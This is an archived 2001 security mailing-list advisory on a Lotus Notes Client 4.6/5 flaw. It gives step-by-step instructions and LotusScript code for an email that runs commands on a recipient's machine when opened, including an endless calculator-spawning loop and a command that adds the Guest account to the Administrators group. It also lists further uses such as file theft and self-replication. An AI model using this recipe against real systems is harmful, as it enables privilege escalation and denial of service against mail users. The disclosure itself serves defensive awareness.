[NEWS] Attacking a Lotus Notes Client

From: support@securiteam.com
Date: 10/24/01 

From: support@securiteam.com
To: list@securiteam.com
Subject: [NEWS] Attacking a Lotus Notes Client
Message-Id: <20011023221037.0ED4A138BF@mail.der-keiler.de>
Date: Wed, 24 Oct 2001 00:10:37 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Attacking a Lotus Notes Client
------------------------------------------------------------------------

SUMMARY

A security vulnerability in Lotus Notes Mail allows users to create
LotusScript (an internal interpreted language) with a malicious intent,
and to cause it to execute without the user's control.

DETAILS

Vulnerable systems:
Lotus Notes Client 5 All releases
Lotus Notes Client 4.6 All releases

With a little LotusScript in your mail, you can execute all what you want
on the recipient's computer - even out of Notes.

Follow these steps:
1) Create a new mail, add recipients
2) Go to the body and click in the menu "Create..Object"
3) Select "Control" and any object you please such as "ActiveXPlugin
Object"
4) Do one of the following:
   In Client 4.6, right click on the object to get "Properties"
   In Client 5, click on the menu the new "Applet" feature, and go to
"Properties" then check "run the object when the document is read"
5) Then select "Edit events": An event pane opens linked to the object
6) In the "Initialize" section Add the following code, where "My EMAIL" is
your Lotus Notes account name (if you get this part wrong, you will bomb
yourself):

              Sub Initialize
                     Dim TaskId As Integer
                     Dim session As New NotesSession
                     If session.CommonUserName<>"My EMAIL" Then
                        Do
                            TaskId%=Shell("CALC.EXE",1)
                        Loop
                     End If
              End Subv

7) In the "Terminate" section, do the same:

              Sub Terminate
                     Dim TaskId As Integer
                     Dim session As New NotesSession
                     If session.CommonUserName<>"My EMAIL" Then
                         Do
                            TaskId%=Shell("CALC.EXE",1)
                         Loop
                     End If
              End Subv

8) Click again on the "Initialize" section
9) Hit the "Send" button

Your ActiveX (or other object you choose) is executed during the reading
of the document.

In this example we just run the calculator in loop, but there can be
infinite possibilities such as formatting hard drives, sending emails,
replicating the script to send it to the whole address-book, sending
files, stealing files from the victim hard drives without him noticing it
and more.

For instance you could replace the Do .. Loop by :

              TaskId%=Shell("CMD.EXE /C net localgroup "
\"Administrators"\" /add guest ",1)

Which will silently add the Guest account to the Administrative group.

NOTE: The SMTP gateway does not let LotusScript pass through making this
an internal treat only.

Solution:
The only solution is to deactivate the preview, and to delete the memo
before reading it.

ADDITIONAL INFORMATION

The information has been provided by <mailto:irib@bunker.freexion.net>
Yann.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages